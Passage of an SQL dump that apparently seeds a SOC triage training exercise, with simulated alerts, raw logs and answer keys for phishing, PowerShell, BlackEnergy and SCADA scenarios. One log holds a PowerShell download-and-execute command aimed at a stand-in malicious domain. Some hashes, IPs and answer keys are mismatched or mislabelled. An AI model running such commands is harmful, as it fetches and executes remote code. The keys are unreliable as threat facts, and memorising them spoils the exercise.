'{\"timestamp\":\"2023-10-05T09:30:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.10\",\"email_sender\":\"phisher@example.com\",\"url\":\"http://malicious-site.com/login\",\"username\":\"asmith\"}', '2025-12-28 12:31:27', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"phisher@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Spamhaus\",\"verdict\":\"malicious\",\"details\":\"Domain frequently used in phishing attacks\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-site.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Site flagged for credential phishing\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"198.51.100.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP associated with spam and phishing\"}}],\"expected_actions\":[\"block_ip\",\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"Both the sender\'s email and the URL are flagged as malicious, confirming a phishing attempt.\"}', 'Beginner', 'SIEM', 1, 0, 'GOVERNMENT'), (247, 'Brute Force Attack Detected - Multiple Failed Logins', 'critical', 'Wazuh', 'Multiple failed login attempts detected, indicating a possible brute force attack. The source IP is from a foreign country with a history of attacks.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2023-10-05T17:00:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.77\",\"dst_ip\":\"192.168.1.10\",\"username\":\"administrator\",\"failed_attempts\":45}', '2025-12-28 11:20:25', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"Shodan\",\"verdict\":\"malicious\",\"details\":\"IP known for brute force attack attempts\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address targeted by brute force\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"High number of failed attempts from a malicious IP confirms a brute force attack.\"}', 'Advanced', 'SIEM', 1, 0, 'OT_ICS'), (248, 'Suspicious Network Traffic - False Positive', 'low', 'Firewall', 'Network traffic was detected from a known cloud provider IP, initially flagged as suspicious. Further investigation reveals it to be legitimate.', 'Network Anomaly', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2023-10-05T11:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"203.0.113.120\",\"dst_ip\":\"192.168.1.50\",\"username\":\"n/a\",\"hostname\":\"SERVER-1\"}', '2025-12-28 01:16:06', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.120\",\"is_critical\":false,\"osint_result\":{\"source\":\"IPInfo\",\"verdict\":\"clean\",\"details\":\"IP belongs to a reputable cloud service provider\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a legitimate server\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_anomaly\",\"analysis_notes\":\"The source IP is from a legitimate cloud provider, reducing the likelihood of malicious intent.\"}', 'Beginner', 'NDR', 1, 0, 'TECH'), (249, 'Suspicious PowerShell Command Execution Detected', 'high', 'endpoint', 'A suspicious PowerShell command that could potentially allow remote code execution or credential dumping was detected on an endpoint.', 'Execution', 'T1086', 1, 'investigating', 54, '{\"log_type\":\"process_creation\",\"timestamp\":\"2023-10-12T14:22:09Z\",\"hostname\":\"Corporate-Laptop-04\",\"username\":\"jdoe\",\"process_name\":\"powershell.exe\",\"cmdline\":\"powershell -nop -c \\\"iex (New-Object Net.WebClient).DownloadString(\'http://maliciousdomain.com/script.ps1\')\\\"\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"parent_process\":\"explorer.exe\",\"parent_process_id\":4821,\"process_id\":9342,\"integrity_level\":\"High\",\"network_activity\":[{\"protocol\":\"HTTP\",\"dest_ip\":\"192.168.1.105\",\"dest_port\":80,\"url\":\"http://maliciousdomain.com/script.ps1\"}]}', '2025-12-28 05:40:53', '2026-01-11 01:09:19', '{\"correct_verdict\":\"True Positive\",\"triage_answer\":\"Suspicious\",\"containment_answer\":\"Isolate Host\",\"scenario\":{\"ip\":\"253.135.96.33\",\"files\":[{\"name\":\"unknown_tool.ps1\",\"type\":\"script\",\"status\":\"SUSPICIOUS\"}],\"email_subject\":null}}', 'Intermediate', 'NULL', 1, 0, NULL), (250, 'Suspicious PowerShell Command Execution Detected', 'medium', 'process', 'A PowerShell script was executed with encoded commands which is commonly used to obfuscate malicious scripts.', 'Behavioral Anomaly', 'T1086', 1, 'Closed', 48, '{\"timestamp\":\"2023-10-23T14:25:36Z\",\"host_name\":\"HR-DESKTOP-07\",\"user_name\":\"j.smith\",\"process_name\":\"powershell.exe\",\"cmdline\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand WwBy\\nYW5kb20gdGV4dF0NCmVjaG8gIlRoaXMgaXMgYSB0ZXN0LiI=\",\"file_hash\":\"3fa4cd6c63168b1eae1f3116ce3f789a175c3abe\",\"parent_process\":\"explorer.exe\",\"parent_process_id\":3452,\"process_id\":6784,\"integrity_level\":\"High\",\"src_ip\":\"192.168.10.23\",\"geo_location\":\"\",\"event_id\":4688,\"logon_type\":2}', '2025-12-28 05:25:32', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"61.243.64.122\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP 61.243.64.122 has 0% abuse confidence score. Located in corporate network range.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"root\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"User accessed from known location during normal business hours. Activity consistent with role.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"suspicious_activity\"}', 'Beginner', 'NULL', 1, 0, NULL), (251, 'Suspicious Network Activity Detected: Potential Data Exfiltration', 'high', 'network', 'Unusual outbound network activity detected, with large volumes of data being transferred to an unknown external IP address over an atypical port.', 'data_exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'New', NULL, '{\"timestamp\":\"2023-11-01T14:23:45Z\",\"src_ip\":\"192.168.1.10\",\"dest_ip\":\"203.0.113.54\",\"src_port\":49876,\"dest_port\":8080,\"protocol\":\"TCP\",\"bytes_sent\":87000000,\"bytes_received\":1240,\"session_duration_sec\":3600,\"flags\":\"SYN,ACK\",\"geoip\":{\"country\":\"Unknown\",\"city\":\"Unknown\"},\"user_agent\":\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)\",\"anomalies\":[\"Unusual port communication\",\"High data transfer volume\"],\"event_id\":\"net-20231101-42345\"}', '2025-12-28 05:42:26', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"237.158.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 237.158.1.45 reported 452 times for malicious activity. Abuse confidence score: 86%.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"service_account\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"suspicious_activity\"}', 'Intermediate', 'SIEM', 1, 0, 'OT_ICS'), (252, 'Successful Login with Previously Compromised Credentials', 'high', 'Authentication Logs', 'An unauthorized login attempt was detected and successfully executed using credentials associated with a known compromised email. This alert aligns with an attack pattern observed in the Acme Corp breach of August 2023, where attackers used publicly available credentials to infiltrate user accounts.', 'Credential Access', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2023-10-11T13:45:23Z\",\"event_source\":\"Authentication Logs\",\"event_id\":\"401\",\"username\":\"j.doe@examplecorp.com\",\"ip_address\":\"192.0.2.123\",\"location\":\"Toronto, Canada\",\"login_status\":\"Success\",\"authentication_method\":\"Password\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\",\"previous_compromise\":\"yes\",\"related_event_ids\":[\"ACME-20230815-0423\"],\"risk_score\":85,\"request_id\":\"req-123456789\"}', '2025-12-28 05:00:05', '2026-01-11 01:09:19', NULL, 'Intermediate', 'SIEM', 1, 0, 'GOVERNMENT'), (253, 'Suspicious PowerShell Execution Detected', 'high', 'CrowdStrike', 'A PowerShell script was executed on a host, which is often used by attackers to download and execute malware. Analysis revealed the script attempted to communicate with a known malicious server.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2023-10-01T14:23:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.101\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"DESKTOP-1A2B3C\",\"file_hash\":\"abc123def456ghi789jkl012mno345pq\",\"domain\":\"malicious-example.com\"}', '2025-12-28 17:13:32', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for hosting malware\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"abc123def456ghi789jkl012mno345pq\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash found in 12 AV engines detecting it as a trojan\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Records\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected host\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell execution with outbound connection to a known malicious IP indicates a malware attempt.\"}', 'Intermediate', 'EDR', 1, 0, 'OT_ICS'), (254, 'Credential Phishing Attempt via Email', 'critical', 'Proofpoint', 'An email was received from a spoofed domain attempting to trick users into providing credentials by clicking a malicious link.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2023-10-02T09:15:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.55\",\"username\":\"asmith\",\"hostname\":\"MAILSERVER\",\"email_sender\":\"no-reply@secure-login.com\",\"url\":\"http://malicious-link.com/login\"}', '2025-12-28 17:13:32', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP involved in multiple phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-link.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL flagged for phishing attempts\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.55\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Records\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the email recipient\'s server\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"block_url\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email with a known phishing URL and spoofed sender suggests a credential phishing attempt.\"}', 'Advanced', 'SIEM', 1, 0, 'OT_ICS'), (255, 'Unauthorized Database Access Detected', 'high', 'database', 'Suspicious access detected on the corporate database outside of normal hours from an unrecognized IP address.', 'Anomaly Detection', 'T1078: Valid Accounts', 1, 'investigating', 54, '{\"timestamp\":\"2023-10-13T02:17:36Z\",\"event_type\":\"DB_access\",\"user\":\"jdoe\",\"access_time\":\"2023-10-13T02:16:45Z\",\"database\":\"CustomerData\",\"action\":\"SELECT\",\"affected_tables\":[\"customers\",\"orders\"],\"source_ip\":\"192.168.32.201\",\"dest_ip\":\"10.0.0.15\",\"login_status\":\"success\",\"access_method\":\"remote\",\"anomalous_activity\":true,\"notes\":\"Access outside of normal working hours (9am-6pm) by user accessing database for the first time.\"}', '2025-12-29 05:48:29', '2026-01-11 01:09:19', '{\"correct_verdict\":\"True Positive\",\"triage_answer\":\"Suspicious\",\"containment_answer\":\"Isolate Host\",\"scenario\":{\"ip\":\"216.32.48.90\",\"files\":[{\"name\":\"unknown_tool.ps1\",\"type\":\"script\",\"status\":\"SUSPICIOUS\"}],\"email_subject\":null}}', 'Intermediate', 'NULL', 1, 0, NULL), (256, 'Suspicious Email Link Detected', 'medium', 'Email Gateway', 'An email containing a potentially harmful link was detected. The link is known to redirect users to phishing sites previously associated with credential harvesting campaigns.', 'Phishing Attempt', 'T1566.001', 1, 'Closed', 54, '{\"timestamp\":\"2023-10-15T08:54:23Z\",\"email_id\":\"ae56d7f3-8496-439b-9077-41795bdee04b\",\"source_email\":\"alerts@banking-security.com\",\"destination_email\":\"johndoe@example.com\",\"subject\":\"Important: Account Verification Needed\",\"link\":\"http://secure-account-login.com/verify\",\"link_status\":\"Blacklisted\",\"detection_method\":\"URL Reputation Check\",\"actions_taken\":\"Email Quarantine\",\"headers\":{\"Received\":\"by mailserver.example.com with SMTP id abc123456 for johndoe@example.com\",\"From\":\"\",\"To\":\"\",\"Subject\":\"Important: Account Verification Needed\",\"Date\":\"15 Oct 2023 08:54:21 +0000\"},\"body\":\"Dear customer, your account requires verification. Click the link to secure your account: http://secure-account-login.com/verify\"}', '2025-12-29 05:31:26', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"security@secure-google.ru\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation\",\"verdict\":\"malicious\",\"details\":\"Sender domain is 3 days old and associated with phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"secure-google.ru\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"53/94 security vendors flagged this domain as malicious.\"}}],\"expected_actions\":[\"block_sender\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\"}', 'Beginner', 'NULL', 1, 0, NULL), (257, 'Suspicious PowerShell Script Execution Detected', 'medium', 'process', 'A PowerShell script was executed which is commonly used in fileless malware attacks. The script attempted network communication with a known malicious IP.', 'Malicious Script Execution', 'T1059.001', 1, 'Closed', 54, '{\"timestamp\":\"2023-10-24T15:45:32Z\",\"event_id\":\"4674\",\"hostname\":\"DESKTOP-WX321\",\"username\":\"JohnDoe\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"cmdline\":\"powershell -NoProfile -ExecutionPolicy Bypass -File \\\"C:\\\\Users\\\\JohnDoe\\\\AppData\\\\Local\\\\Temp\\\\script.ps1\\\"\",\"file_hash\":\"3efd49ddfee84548bede1e13c4433b29f1db3f1d9b7f95c42e0b5cda1844afb0\",\"network_communication\":{\"src_ip\":\"192.168.1.10\",\"dest_ip\":\"203.0.113.45\",\"dest_port\":443,\"protocol\":\"HTTPS\"},\"detection_engine\":\"Signature-based\",\"signature_id\":\"POWERSHELL-0012\",\"additional_info\":\"The destination IP is associated with known C2 servers.\"}', '2025-12-29 05:44:17', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"56.201.107.90\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 56.201.107.90 reported 310 times for malicious activity. Abuse confidence score: 89%.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"service_account\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"suspicious_activity\"}', 'Beginner', 'NULL', 1, 0, NULL), (259, 'Suspicious PowerShell Execution Detected on Internal Host', 'high', 'CrowdStrike', 'A PowerShell script with obfuscated content was executed on an internal host. The script was used to download and execute a known malicious payload.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2023-11-01T14:23:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"CORP-WKS-0123\",\"file_hash\":\"3b1f2e1a2f8b9f7c6d4e5b3a2c5d6e7f\",\"domain\":\"malicious-example.com\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -EncodedCommand YABhAHMAaAAgAC0AZQAgACcAMwBiADEAZgAyAGUAMQBhADIAZgA4AGIAOQBmADcAYwA2AGQANABlADUAYgAzAGEAMgBjADUAZABlADcAZgAnAA==\"}', '2025-12-30 01:27:50', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address associated with host CORP-WKS-0123.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for hosting malicious content.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3b1f2e1a2f8b9f7c6d4e5b3a2c5d6e7f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected in multiple malware samples.\"}},{\"id\":\"artifact_4\",\"type\":\"domain\",\"value\":\"malicious-example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain involved in distributing malware.\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The presence of obfuscated PowerShell commands, a malicious file hash, and connections to a known malicious IP and domain confirm this as a malware attack.\"}', 'Intermediate', 'EDR', 1, 0, 'OT_ICS'), (268, 'Phishing Email Detected', 'medium', 'Email Gateway', 'Employees report suspicious emails that appear to be from a trusted partner. Analysis of the email gateway logs reveals a phishing attempt with malicious attachments disguised as urgent documents.', 'Phishing', 'T1566.001', 1, 'Closed', 34, '{\"timestamp\":\"2023-10-08T14:23:45Z\",\"email_id\":\"abc123@example.com\",\"from\":\"partner.support@trustedpartner.com\",\"to\":\"employee@corporate.com\",\"subject\":\"Urgent: Action Required\",\"attachment\":\"urgent_document.pdf\",\"attachment_hash\":\"3a7bd3e2360f1edb0f3b4e5c7b6e9d5a\",\"source_ip\":\"192.168.1.100\",\"destination_ip\":\"10.0.0.15\",\"external_ip\":\"203.0.113.45\"}', '2025-12-31 13:10:04', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"abc123@example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Gateway Logs\",\"verdict\":\"suspicious\",\"details\":\"Unusual email activity detected.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3a7bd3e2360f1edb0f3b4e5c7b6e9d5a\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malware detected in attachment.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'NULL', 1, 0, NULL), (269, 'BlackEnergy Malware Execution', 'high', 'EDR', 'After a user opens the malicious attachment, BlackEnergy malware is executed, providing the attackers with a foothold in the network. Endpoint Detection and Response (EDR) alerts on suspicious process activity linked to known malware signatures.', 'Malware', 'T1203: Exploitation for Client Execution', 1, 'Closed', 34, '{\"timestamp\":\"2023-10-05T14:23:11Z\",\"event_id\":\"987654321\",\"hostname\":\"CORP-ENDPOINT-23\",\"internal_ip\":\"192.168.1.45\",\"external_ip\":\"203.0.113.50\",\"username\":\"jdoe\",\"malware_name\":\"BlackEnergy\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\Downloads\\\\invoice.doc\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"process_name\":\"word.exe\",\"process_id\":4321,\"alert_signature\":\"BlackEnergy Malware Execution\"}', '2025-12-31 13:10:04', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address associated with BlackEnergy campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash matches known BlackEnergy malware sample.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"invoice.doc\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"File name commonly used in phishing campaigns.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user within the organization.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (270, 'Persistence Mechanism Established', 'high', 'EDR', 'The attackers have used BlackEnergy malware to establish persistence on the target system. This was achieved through registry modifications and the creation of scheduled tasks, which were detected as anomalies in system configurations by the EDR.', 'Persistence', 'T1053: Scheduled Task/Job, T1112: Modify Registry', 1, 'new', 34, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_type\":\"persistence\",\"host_ip\":\"10.0.1.15\",\"external_ip\":\"203.0.113.45\",\"process_name\":\"schtasks.exe\",\"user\":\"compromised_user\",\"registry_key\":\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\BlackEnergy\",\"scheduled_task\":\"BlackEnergy Task\",\"file_path\":\"C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\malicious.exe\",\"file_hash\":\"3fa85f64-5717-4562-b3fc-2c963f66afa6\"}', '2025-12-31 13:10:04', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network_check\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_database\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known APT activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3fa85f64-5717-4562-b3fc-2c963f66afa6\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash matches known BlackEnergy variant.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\malicious.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"malicious\",\"details\":\"File associated with unauthorized persistence mechanism.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_user_audit\",\"verdict\":\"suspicious\",\"details\":\"User account used in unauthorized actions.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (271, 'Lateral Movement to OT Network', 'high', 'Network Monitoring Solution', 'Network monitoring solutions detect unusual lateral movement between the IT and OT networks, indicating the attackers are attempting to access the SCADA systems controlling the power grid. A suspicious connection attempt from an internal IT network to the OT network was observed using a compromised user account.', 'Lateral Movement', 'T1071.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"src_ip\":\"192.168.1.101\",\"dst_ip\":\"10.0.0.5\",\"username\":\"jdoe\",\"event_type\":\"connection_attempt\",\"protocol\":\"SMB\",\"file_accessed\":\"\\\\\\\\OT-SERVER\\\\SCADA\\\\config.dat\",\"hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"external_attacker_ip\":\"203.0.113.55\",\"connection_status\":\"failed\",\"reason\":\"Unauthorized access attempt detected\"}', '2025-12-31 13:10:04', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address from IT network\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address from OT network\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Compromised user account attempting lateral movement\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malicious hash associated with credential dumping tool\"}},{\"id\":\"artifact_5\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":false,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with previous cyber attacks targeting critical infrastructure\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NULL', 1, 0, NULL), (272, 'SCADA System Compromise', 'critical', 'SCADA Logs', 'Unauthorized command executions detected on SCADA systems, coinciding with a power outage. The attackers issued commands to disrupt power distribution, leading to a blackout.', 'Execution', 'T0811', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T02:45:12Z\",\"system_id\":\"SCADA-CTRL-01\",\"event_type\":\"command_execution\",\"user\":\"unauthorized_user\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"10.0.0.20\",\"command_executed\":\"shutdown -h now\",\"external_attacker_ip\":\"203.0.113.45\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"filename\":\"malicious_script.sh\"}', '2025-12-31 13:10:04', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network 